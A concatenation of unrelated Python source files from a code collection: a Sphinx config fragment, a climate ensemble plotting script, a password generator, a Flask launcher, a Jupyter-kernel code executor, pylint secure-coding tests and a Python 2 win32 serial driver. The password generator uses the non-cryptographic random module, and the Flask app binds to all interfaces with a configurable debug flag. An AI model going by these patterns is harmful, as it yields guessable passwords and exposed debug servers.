to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for edit_on_github ---------------------------------------------- edit_on_github_project = 'thfabian/dawn' edit_on_github_branch = 'master'
py
7dfa21a42c4962e01991bccd72d89315398a82d5
"""Plot the chosen field for each ensemble.""" import math import os import matplotlib.pyplot as plt import numpy as np import cartopy.crs as ccrs # User-defined libraries from read_netcdf import read_n_2d_fields def ens_plots(dir_output, dir_plot, name_outputs, numclus, field_to_plot, plot_type): """Plot the chosen field for each ensemble.""" print('Number of clusters: {0}'.format(numclus)) varname = name_outputs.split("_")[0] kind = name_outputs.split("_")[-2] exp = name_outputs.split("_")[-1] # Reading the netCDF file of N 2Dfields of anomalies, saved by ens_anom.py namef = os.path.join(dir_output, 'ens_anomalies_{0}.nc' .format(name_outputs)) vartoplot, varunits, lat, lon = read_n_2d_fields(namef) print('vartoplot dim: (numens x lat x lon)={0}'.format(vartoplot.shape)) numens = vartoplot.shape[0] # ____________Load labels namef = os.path.join(dir_output, 'labels_{0}.txt'.format(name_outputs)) labels = np.loadtxt(namef, dtype=int) vmi = round_down(np.nanpercentile(vartoplot, 0.1)) vma = round_up(np.nanpercentile(vartoplot, 99.9)) if field_to_plot == 'anomalies': # compute range colorbar for anomalies if abs(vmi) < abs(vma): rangecbarmin = -abs(vma) rangecbarmax = abs(vma) else: rangecbarmin = -abs(vmi) rangecbarmax = abs(vmi) else: # compute range colorbar for climatologies rangecbarmin = vmi rangecbarmax = vma delta = round_down((rangecbarmax - rangecbarmin) / 100) clevels = np.arange(rangecbarmin, rangecbarmax + delta, delta) colors = ['b', 'g', 'r', 'c', 'm', 'y', 'DarkOrange', 'grey'] proj = ccrs.PlateCarree() xpos = int(np.ceil(np.sqrt(numens * 1.6))) ypos = int(np.ceil(numens / xpos)) fig = plt.figure(figsize=(24, 14)) if min(lon) < 180. < max(lon): clon = 180. else: clon = 0. for nens in range(numens): axes = plt.subplot(xpos, ypos, nens + 1, projection=ccrs.PlateCarree(central_longitude=clon)) axes.set_extent([min(lon), max(lon), min(lat), max(lat)], crs=ccrs.PlateCarree()) axes.coastlines("110m") # Plot Data if field_to_plot == 'anomalies': map_plot = plt.contourf(lon, lat, vartoplot[nens], clevels, cmap=plt.cm.RdBu_r, transform=proj, extend='both') else: map_plot = plt.contourf(lon, lat, vartoplot[nens], clevels, transform=proj, extend='both') # Add Title title_obj = plt.title(nens, fontsize=32, fontweight='bold') for nclus in range(numclus): if nens in np.where(labels == nclus)[0]: title_obj.set_backgroundcolor(colors[nclus]) cax = plt.axes([0.1, 0.03, 0.8, 0.03]) # horizontal cbar = plt.colorbar(map_plot, cax=cax, orientation='horizontal') cbar.ax.tick_params(labelsize=18) cbar.set_ticks(np.arange(rangecbarmin, rangecbarmax + delta, delta * 20)) plt.suptitle(exp + ' ' + kind + ' ' + varname + ' ' + field_to_plot + ' (' + varunits + ')', fontsize=45, fontweight='bold') top = 0.89 # the top of the subplots of the figure bottom = 0.12 # the bottom of the subplots of the figure left = 0.02 # the left side of the subplots of the figure right = 0.98 # the right side of the subplots of the figure hspace = 0.36 # amount of height reserved for white space between subplots wspace = 0.14 # amount of width reserved for blank space between subplots plt.subplots_adjust(left=left, bottom=bottom, right=right, top=top, wspace=wspace, hspace=hspace) # plot the selected fields namef = os.path.join(dir_plot, ('{0}_{1}.' + plot_type) .format(field_to_plot, name_outputs)) fig.savefig(namef) # bbox_inches='tight') print('A ', plot_type, ' figure for the selected fields saved in {0}' .format(dir_plot)) return namef def round_up(x, sig=2): """Round up to a given number of significant digits.""" dig = pow(10., sig - int(math.floor(math.log10(abs(x)))) - 1) return math.ceil(x * dig) / dig def round_down(x, sig=2): """Round down to a given number of significant digits.""" dig = pow(10., sig - int(math.floor(math.log10(abs(x)))) - 1) return math.floor(x * dig) / dig
py
7dfa21d52d39354a8caad714a833a72763c2457c
''' Created on 2017年8月16日 随机密码生产 @author: liliangang ''' import random class RandomPassword: def __init__(self, length=8): self.factor = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*()_+=-' self.length = length def next(self, length=0): length = length if length > 0 else self.length array = [] for i in range(length) : array.append(self.factor[random.randint(0, len(self.factor) - 1)]) return ''.join(array) if __name__ == '__main__': for i in range(10) : print(RandomPassword().next());
py
7dfa2283428e850dbca123dade2a0b8421febba4
import settings from app import app app.run(host='0.0.0.0', debug=settings.DEBUG)
py
7dfa22a5a2de29471f24eabbf8507f3f217d334e
# -*- coding: utf-8 -*- # # Copyright (c) 2021-2022, Geoffrey M. Poore # All rights reserved. # # Licensed under the BSD 3-Clause License: # http://opensource.org/licenses/BSD-3-Clause # from __future__ import annotations import base64 import queue import re import time import pathlib try: import jupyter_client except ImportError: jupyter_client = None from .. import util from .. import message from ..code_collections import Session from ..progress import Progress _ansi_color_escape_code_re = re.compile('\x1b.*?m') kernel_name_aliases: dict[str, str] = {} if jupyter_client is not None: duplicates = set() for k, v in jupyter_client.kernelspec.KernelSpecManager().get_all_specs().items(): for alias in [k.lower(), v['spec']['display_name'].lower(), v['spec']['language'].lower()]: if alias in kernel_name_aliases: duplicates.add(alias) else: kernel_name_aliases[alias] = k for k in duplicates: del kernel_name_aliases[k] del duplicates mime_type_to_file_extension_map: dict[str, str] = { 'image/png': 'png', 'image/jpeg': 'jpg', 'image/svg+xml': 'svg', 'application/pdf': 'pdf', } _home_path_re_pattern = re.escape(pathlib.Path('~').expanduser().as_posix()).replace('/', r'[\\/]') _home_path_re = re.compile(_home_path_re_pattern, re.IGNORECASE) async def exec(session: Session, *, cache_key_path: pathlib.Path, progress: Progress) -> None: ''' Execute code from a session with a Jupyter kernel, attach textual output to the code chunks within the session, and save rich output files. ''' # https://jupyter-client.readthedocs.io/en/stable/api/client.html # https://jupyter-client.readthedocs.io/en/stable/messaging.html#messages-on-the-iopub-pub-sub-channel session.did_exec = True progress.session_exec_stage_start(session, stage='run') if jupyter_client is None: msg = 'Cannot import "jupyter_client" Python module; install it and try again' session.errors.append(message.SysConfigError(msg)) progress.session_exec_stage_end(session, stage='run') progress.session_finished(session) return if jupyter_client.version_info < (6, 1): # Require async support msg = f'jupyter_client >= 6.1.0 is required; version {jupyter_client.__version__} is installed' session.errors.append(message.SysConfigError(msg)) progress.session_exec_stage_end(session, stage='run') progress.session_finished(session) return kernel_name = kernel_name_aliases.get(session.jupyter_kernel.lower()) if kernel_name is None: msg = f'No Jupyter kernel was found for "{session.jupyter_kernel}"' session.errors.append(message.SysConfigError(msg)) progress.session_exec_stage_end(session, stage='run') progress.session_finished(session) return kernel_manager = jupyter_client.AsyncKernelManager(kernel_name=kernel_name) try: await kernel_manager.start_kernel() except jupyter_client.kernelspec.NoSuchKernel: msg = f'No Jupyter kernel was found for "{session.jupyter_kernel}"' session.errors.append(message.SysConfigError(msg)) progress.session_exec_stage_end(session, stage='run') progress.session_finished(session) return except FileNotFoundError: msg = f'Jupyter kernel for "{session.jupyter_kernel}" has been deleted or corrupted' session.errors.append(message.SysConfigError(msg)) progress.session_exec_stage_end(session, stage='run') progress.session_finished(session) return except Exception as e: msg = f'Failed to start Jupyter kernel for "{session.jupyter_kernel}":\n{e}' session.errors.append(message.SysConfigError(msg)) progress.session_exec_stage_end(session, stage='run') progress.session_finished(session) return kernel_client = kernel_manager.client() kernel_client.start_channels() try: await kernel_client.wait_for_ready() except RuntimeError as e: kernel_client.stop_channels() await kernel_manager.shutdown_kernel() msg = f'Jupyter kernel timed out during setup:\n{e}' session.errors.append(message.RunConfigError(msg)) progress.session_exec_stage_end(session, stage='run') progress.session_finished(session) return try: kernel_has_errors = False incomplete_cc_stack = [] for cc in session.code_chunks: if kernel_has_errors: break if cc.output_index != cc.index: # If incomplete code, accumulate until complete incomplete_cc_stack.append(cc) continue if not incomplete_cc_stack: progress.chunk_start(session, chunk=cc) cc_jupyter_id = kernel_client.execute(cc.code) else: incomplete_cc_stack.append(cc) progress.chunk_start(session, chunk=incomplete_cc_stack[0]) cc_jupyter_id = kernel_client.execute('\n'.join(icc.code for icc in incomplete_cc_stack)) deadline = time.monotonic() + session.jupyter_timeout while True: try: kernel_msg = await kernel_client.get_iopub_msg(timeout=max(0, deadline - time.monotonic())) except queue.Empty: kernel_msg = (f'Jupyter kernel "{kernel_name}" timed out during execution ' f'(jupyter_timeout = {session.jupyter_timeout} s)') cc.errors.append(message.RunConfigError(kernel_msg)) kernel_has_errors = True break if kernel_msg['parent_header'].get('msg_id') != cc_jupyter_id: continue kernel_msg_type = kernel_msg['msg_type'] kernel_msg_content = kernel_msg['content'] if kernel_msg_type == 'status' and kernel_msg_content['execution_state'] == 'idle': break if kernel_msg_type in ('display_data', 'execute_result'): # Rich output if cc.rich_output is None: cc.rich_output = [] rich_output_files = {} rich_output = {'files': rich_output_files, 'data': kernel_msg_content['data']} for mime_type, data in kernel_msg_content['data'].items(): file_extension = mime_type_to_file_extension_map.get(mime_type) if file_extension is None: continue if 'name' not in cc.options: file_name = f'''{kernel_name}-{session.name or ''}-{cc.output_index+1:03d}-{len(cc.rich_output)+1:02d}.{file_extension}''' else: file_name = f'''{cc.options['name']}-{len(cc.rich_output)+1}.{file_extension}''' session.files.append(file_name) ro_path = cache_key_path / file_name ro_path.write_bytes(base64.b64decode(data)) rich_output_files[mime_type] = ro_path.as_posix() cc.rich_output.append(rich_output) rich_output_text = kernel_msg_content['data'].get('text/plain') if rich_output_text: progress.chunk_rich_output_text(session, chunk=cc, output=rich_output_text) if rich_output_files: progress.chunk_rich_output_files(session, chunk=cc, files=rich_output_files.values()) elif kernel_msg_type == 'stream': if kernel_msg_content['name'] == 'stdout': cc.stdout_lines.extend(util.splitlines_lf(kernel_msg_content['text'])) progress.chunk_stdout(session, chunk=cc, output=kernel_msg_content['text']) elif kernel_msg_content['name'] == 'stderr': cc.stderr_lines.extend(util.splitlines_lf(_home_path_re.sub('~', kernel_msg_content['text']))) progress.chunk_stderr(session, chunk=cc, output=kernel_msg_content['text']) elif kernel_msg_type == 'error': kernel_msg_text = _ansi_color_escape_code_re.sub('', '\n'.join(kernel_msg_content['traceback'])) kernel_msg_text = _home_path_re.sub('~', kernel_msg_text) # This is currently treated as a `StderrRunError` and # stored in `stderr_lines`. For some kernels, it may # make more sense to use `RunError` or further refine the # error system. cc.stderr_lines.extend(util.splitlines_lf(kernel_msg_text)) cc.errors.append(message.StderrRunError(cc.stderr_lines)) kernel_has_errors = True progress.chunk_stderr(session, chunk=cc, output=kernel_msg_text) if not incomplete_cc_stack: progress.chunk_end(session, chunk=cc) else: # `progress` only takes first chunk but accounts for all # chunks that are grouped together progress.chunk_end(session, chunk=incomplete_cc_stack[0]) incomplete_cc_stack = [] finally: kernel_client.stop_channels() await kernel_manager.shutdown_kernel() progress.session_exec_stage_end(session, stage='run') progress.session_finished(session)
py
7dfa2463457374242dd37af4a377e32964209567
# -*- coding: utf-8 -*- # Copyright 2021 Damien Nguyen # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import astroid import pylint.testutils import pytest import pylint_secure_coding_standard as pylint_scs try: from pylint.testutils import MessageTest except ImportError: from pylint.testutils import Message as MessageTest class TestSecureCodingStandardChecker(pylint.testutils.CheckerTestCase): CHECKER_CLASS = pylint_scs.SecureCodingStandardChecker def test_tempfile_mktemp_ok(self): import_node1, import_node2, call_node1 = astroid.extract_node( """ import tempfile #@ import tempfile as temp #@ tempfile.mkstemp() #@ """ ) with self.assertNoMessages(): self.checker.visit_import(import_node1) self.checker.visit_import(import_node2) self.checker.visit_call(call_node1) @pytest.mark.parametrize( 's', ('from tempfile import mktemp',), ) def test_tempfile_mktemp_importfrom(self, s): node = astroid.extract_node(s + ' #@') with self.assertAddsMessages(MessageTest(msg_id='replace-mktemp', node=node)): self.checker.visit_importfrom(node) @pytest.mark.parametrize( 's', ( 'mktemp()', 'tempfile.mktemp()', ), ) def test_tempfile_mktemp_call(self, s): node = astroid.extract_node(s + ' #@') with self.assertAddsMessages(MessageTest(msg_id='replace-mktemp', node=node)): self.checker.visit_call(node)
py
7dfa260dc508867dc9837368eef1016186ac36a9
#! python #Python Serial Port Extension for Win32, Linux, BSD, Jython #serial driver for win32 #see __init__.py # #(C) 2001-2003 Chris Liechti <[email protected]> # this is distributed under a free software license, see license.txt import win32file # The base COM port and file IO functions. import win32event # We use events and the WaitFor[Single|Multiple]Objects functions. import win32con # constants. from serialutil import * VERSION = "$Revision$".split()[1] #extract CVS version #from winbase.h. these should realy be in win32con MS_CTS_ON = 16 MS_DSR_ON = 32 MS_RING_ON = 64 MS_RLSD_ON = 128 def device(portnum): """Turn a port number into a device name""" #the "//./COMx" format is required for devices >= 9 #not all versions of windows seem to support this propperly #so that the first few ports are used with the DOS device name if portnum < 9: return 'COM%d' % (portnum+1) #numbers are transformed to a string else: return r'\\.\COM%d' % (portnum+1) class Serial(SerialBase): """Serial port implemenation for Win32. This implemenatation requires a win32all installation.""" BAUDRATES = (50,75,110,134,150,200,300,600,1200,1800,2400,4800,9600, 19200,38400,57600,115200) def open(self): """Open port with current settings. This may throw a SerialException if the port cannot be opened.""" if self._port is None: raise SerialException("Port must be configured before it can be used.") self.hComPort = None try: self.hComPort = win32file.CreateFile(self.portstr, win32con.GENERIC_READ | win32con.GENERIC_WRITE, 0, # exclusive access None, # no security win32con.OPEN_EXISTING, win32con.FILE_ATTRIBUTE_NORMAL | win32con.FILE_FLAG_OVERLAPPED, None) except Exception, msg: self.hComPort = None #'cause __del__ is called anyway raise SerialException("could not open port: %s" % msg) # Setup a 4k buffer win32file.SetupComm(self.hComPort, 4096, 4096) #Save original timeout values: self._orgTimeouts = win32file.GetCommTimeouts(self.hComPort) self._rtsState = win32file.RTS_CONTROL_ENABLE self._dtrState = win32file.RTS_CONTROL_ENABLE self._reconfigurePort() # Clear buffers: # Remove anything that was there win32file.PurgeComm(self.hComPort, win32file.PURGE_TXCLEAR | win32file.PURGE_TXABORT | win32file.PURGE_RXCLEAR | win32file.PURGE_RXABORT) self._overlappedRead = win32file.OVERLAPPED() self._overlappedRead.hEvent = win32event.CreateEvent(None, 1, 0, None) self._overlappedWrite = win32file.OVERLAPPED() #~ self._overlappedWrite.hEvent = win32event.CreateEvent(None, 1, 0, None) self._overlappedWrite.hEvent = win32event.CreateEvent(None, 0, 0, None) self._isOpen = True def _reconfigurePort(self): """Set commuication parameters on opened port.""" if not self.hComPort: raise SerialException("Can only operate on a valid port handle") #Set Windows timeout values #timeouts is a tuple with the following items: #(ReadIntervalTimeout,ReadTotalTimeoutMultiplier, # ReadTotalTimeoutConstant,WriteTotalTimeoutMultiplier, # WriteTotalTimeoutConstant) if self._timeout is None: timeouts = (0, 0, 0, 0, 0) elif self._timeout == 0: timeouts = (win32con.MAXDWORD, 0, 0, 0, 0) else: timeouts = (0, 0, int(self._timeout*1000), 0, 0) if self._writeTimeout is None: pass elif self._writeTimeout == 0: timeouts = timeouts[:-2] + (0, win32con.MAXDWORD) else: timeouts = timeouts[:-2] + (0, int(self._writeTimeout*1000)) win32file.SetCommTimeouts(self.hComPort, timeouts) win32file.SetCommMask(self.hComPort, win32file.EV_ERR) # Setup the connection info. # Get state and modify it: comDCB = win32file.GetCommState(self.hComPort) comDCB.BaudRate = self._baudrate if self._bytesize == FIVEBITS: comDCB.ByteSize = 5 elif self._bytesize == SIXBITS: comDCB.ByteSize = 6 elif self._bytesize == SEVENBITS: comDCB.ByteSize = 7 elif self._bytesize == EIGHTBITS: comDCB.ByteSize = 8 else: raise ValueError("Unsupported number of data bits: %r" % self._bytesize) if self._parity == PARITY_NONE: comDCB.Parity = win32file.NOPARITY comDCB.fParity = 0 # Dis/Enable Parity Check elif self._parity == PARITY_EVEN: comDCB.Parity = win32file.EVENPARITY comDCB.fParity = 1 # Dis/Enable Parity Check elif self._parity == PARITY_ODD: comDCB.Parity = win32file.ODDPARITY comDCB.fParity = 1 # Dis/Enable Parity Check else: raise ValueError("Unsupported parity mode: %r" % self._parity) if self._stopbits == STOPBITS_ONE: comDCB.StopBits = win32file.ONESTOPBIT elif self._stopbits == STOPBITS_TWO: comDCB.StopBits = win32file.TWOSTOPBITS else: raise ValueError("Unsupported number of stop bits: %r" % self._stopbits) comDCB.fBinary = 1 # Enable Binary Transmission # Char. w/ Parity-Err are replaced with 0xff (if fErrorChar is set to TRUE) if self._rtscts: comDCB.fRtsControl = win32file.RTS_CONTROL_HANDSHAKE else: comDCB.fRtsControl = self._rtsState if self._dsrdtr: comDCB.fDtrControl = win32file.DTR_CONTROL_HANDSHAKE else: comDCB.fDtrControl = self._dtrState comDCB.fOutxCtsFlow = self._rtscts comDCB.fOutxDsrFlow = self._dsrdtr comDCB.fOutX = self._xonxoff comDCB.fInX = self._xonxoff comDCB.fNull = 0 comDCB.fErrorChar = 0 comDCB.fAbortOnError = 0 comDCB.XonChar = XON comDCB.XoffChar = XOFF try: win32file.SetCommState(self.hComPort, comDCB) except win32file.error, e: raise ValueError("Cannot configure port, some setting was wrong. Original message: %s" % e) #~ def __del__(self): #~ self.close() def close(self): """Close port""" if self._isOpen: if self.hComPort: #Restore original timeout values: win32file.SetCommTimeouts(self.hComPort, self._orgTimeouts) #Close COM-Port: win32file.CloseHandle(self.hComPort) self.hComPort = None self._isOpen = False def makeDeviceName(self, port): return device(port) # - - - - - - - - - - - - - - - - - - - - - - - - def inWaiting(self): """Return the number of characters currently in the input buffer.""" flags, comstat = win32file.ClearCommError(self.hComPort) return comstat.cbInQue def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if not self.hComPort: raise portNotOpenError if size > 0: win32event.ResetEvent(self._overlappedRead.hEvent) flags, comstat = win32file.ClearCommError(self.hComPort) if self.timeout == 0: n = min(comstat.cbInQue, size) if n > 0: rc, buf = win32file.ReadFile(self.hComPort, win32file.AllocateReadBuffer(n), self._overlappedRead) win32event.WaitForSingleObject(self._overlappedRead.hEvent, win32event.INFINITE) read = str(buf) else: read = '' else: rc, buf = win32file.ReadFile(self.hComPort, win32file.AllocateReadBuffer(size), self._overlappedRead) n = win32file.GetOverlappedResult(self.hComPort, self._overlappedRead, 1) read = str(buf[:n]) else: read = '' return read def write(self, s): """Output the given string over the serial port.""" if not self.hComPort: raise portNotOpenError #print repr(s), if s: #~ win32event.ResetEvent(self._overlappedWrite.hEvent) err, n = win32file.WriteFile(self.hComPort, s, self._overlappedWrite) if err: #will be ERROR_IO_PENDING: # Wait for the write to complete. #~ win32event.WaitForSingleObject(self._overlappedWrite.hEvent, win32event.INFINITE) n = win32file.GetOverlappedResult(self.hComPort, self._overlappedWrite, 1) if n != len(s): raise writeTimeoutError def flushInput(self): """Clear input buffer, discarding all that is in the buffer.""" if not self.hComPort: raise portNotOpenError win32file.PurgeComm(self.hComPort, win32file.PURGE_RXCLEAR | win32file.PURGE_RXABORT) def flushOutput(self): """Clear output buffer, aborting the current output and discarding all that is in the buffer.""" if not self.hComPort: raise portNotOpenError win32file.PurgeComm(self.hComPort, win32file.PURGE_TXCLEAR | win32file.PURGE_TXABORT) def sendBreak(self): """Send break condition.""" if not self.hComPort: raise portNotOpenError import time win32file.SetCommBreak(self.hComPort) #TODO: how to set the correct duration?? time.sleep(0.020) win32file.ClearCommBreak(self.hComPort) def setRTS(self,level=1): """Set terminal status line: Request To Send""" if not self.hComPort: raise portNotOpenError if level: self._rtsState = win32file.RTS_CONTROL_ENABLE win32file.EscapeCommFunction(self.hComPort, win32file.SETRTS) else: self._rtsState = win32file.RTS_CONTROL_DISABLE win32file.EscapeCommFunction(self.hComPort, win32file.CLRRTS) def setDTR(self,level=1): """Set terminal status line: Data Terminal Ready""" if not self.hComPort: raise portNotOpenError if level: self._dtrState = win32file.DTR_CONTROL_ENABLE win32file.EscapeCommFunction(self.hComPort, win32file.SETDTR) else: self._dtrState = win32file.DTR_CONTROL_DISABLE win32file.EscapeCommFunction(self.hComPort, win32file.CLRDTR) def getCTS(self): """Read terminal status line: Clear To Send""" if not self.hComPort: raise portNotOpenError return MS_CTS_ON & win32file.GetCommModemStatus(self.hComPort) != 0 def getDSR(self): """Read terminal status line: Data Set Ready""" if not self.hComPort: raise portNotOpenError return MS_DSR_ON & win32file.GetCommModemStatus(self.hComPort) != 0 def getRI(self): """Read terminal status line: Ring Indicator""" if not self.hComPort: raise portNotOpenError return MS_RING_ON & win32file.GetCommModemStatus(self.hComPort) != 0 def getCD(self): """Read terminal status line: Carrier Detect""" if not self.hComPort: raise portNotOpenError return MS_RLSD_ON & win32file.GetCommModemStatus(self.hComPort) != 0 # - - platform specific - - - - def setXON(self, level=True): """Platform specific - set flow state.""" if not self.hComPort: raise portNotOpenError if level: win32file.EscapeCommFunction(self.hComPort, win32file.SETXON) else: win32file.EscapeCommFunction(self.hComPort, win32file.SETXOFF) #Nur Testfunktion!! if __name__ == '__main__': print __name__ s = Serial() print s s = Serial(0) print s s.baudrate = 19200 s.databits = 7 s.close() s.port = 3 s.open() print s